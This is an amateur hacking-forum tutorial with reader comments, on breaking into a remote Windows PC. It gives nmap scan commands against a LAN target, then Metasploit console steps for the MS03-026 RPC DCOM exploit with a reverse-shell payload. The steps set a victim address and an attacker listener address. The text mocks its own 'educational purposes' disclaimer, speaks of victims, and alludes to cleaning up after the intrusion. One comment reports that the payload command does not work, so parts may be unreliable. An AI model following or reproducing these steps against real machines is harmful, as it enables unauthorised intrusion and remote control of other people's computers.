exploiting Windows, Linux, and MACs
exploiting Windows, Linux, and MACs
For any evil genius out there, I just want to tell you that this tutorial is for educational purposes only, and should be used with care, and not against ANY server without the permission of the admin. ( * cough-cough * ) must be the bird flu.
INTRODUCTION As you might already know, many computers today come with unconfigured software packages which might compromise the PCs security. The software run by these computers uses PORTS (you can think of them as medium through which information is send to, and from). Ports associated with software allow an attacker to exploit the software flaw; thus giving a person ROOT (admin). Now how do you do this, you might ask. That's why you should read on furiously, in order to find out.
PORT SCANNING One has to scan the computer they want to "hack", if they know the IP address. This is usually done with a port scanner, like NMAP (www.insecure.org/nmap/). In order to scan your whole network, for example a Verizon DSL home LAN, I would use: nmap -v 192.168.1.* (with root status) and if you see your target in the list, then procede to focus your scan on their IP address, but this time with more options. I usually do: nmap -v -sS -P0 -nAF 192.168.1.46 (just as an example of a victim I'm scanning in my LAN) The goal here is to find open ports. When scanning windows machines, I look for port 135 - Microsoft Remote Procedure Call (RPC) service, and try to exploit the service running behind it.
METASPLOIT FRAMEWORK Let's say that port 135 is open. We will proceed to exploit the software running behind it. In order to do that, we download the metasploit framework, from: http://www.metasploit.com/projects/Framework/downloads.html Then install it, and go to the directory containing it, If launched properly, it should say (in ur shell or CMD prompt): MSF > Type in: msfupdate Updates your exploits, and payloads show exploits This should list all available exploits info msrpc_dcom_ms03_026 - info about the exploit use msrpc_dcom_ms03_026 - use the expoit show payloads - the payload we want to generate info win32_reverse_ord - info about the payload use win32_reverse_ord use this payload set RHOST 192.168.1.46 - victim's IP address set RPORT 135 - victim's port to use set LHOST 192.168.1.1- attacker's IP address set LPORT 4321- attacker's port to report to show options - information about the attack
when you're SURE/ready to perform your attack, type: exploit - BOOM! You're IN, my friend – if all went well.
Type in: ipconfig /all - to see the IP address you're using… it should say 192.168.1.46 (just as an example of the victim's IP address).
CONCLUSION I'll assume you know how clean up after the intrusion. So, be smart and careful about anything you do to the remote PC (since, you're ROOT).
NOTE I hope you enjoyed my article (this is my first, so please take it easy on the ratings for me… I promise to make clearer ones next time. Also, this is only one exploits. There are many combinations you can use to "hack" Linux, Mac, and Windows boxes. In other words, this is really applicable when it comes to gaining root, or executing arbitrary code on a remote machine.
ghost 18 years ago
mm i liked it.. but how about writing the how to clean up after the intrusion. part :P ? at least for the case where the victim is using linux.. or windows or anything
ghost 17 years ago
I dont get the "use win32_reverse_ord" command to work, you sure thats how you use a payload? Or am i doing it wrong? :)
ghost 17 years ago
It's an alright article describing a single vector of attack. A little more background on what the exploit actually does, why RPC is vulnerable, and changing the title to reflect the coverage of a single attack would've made it much better. Anyways, it did what it set out to do, so I can't rate it anything less than good.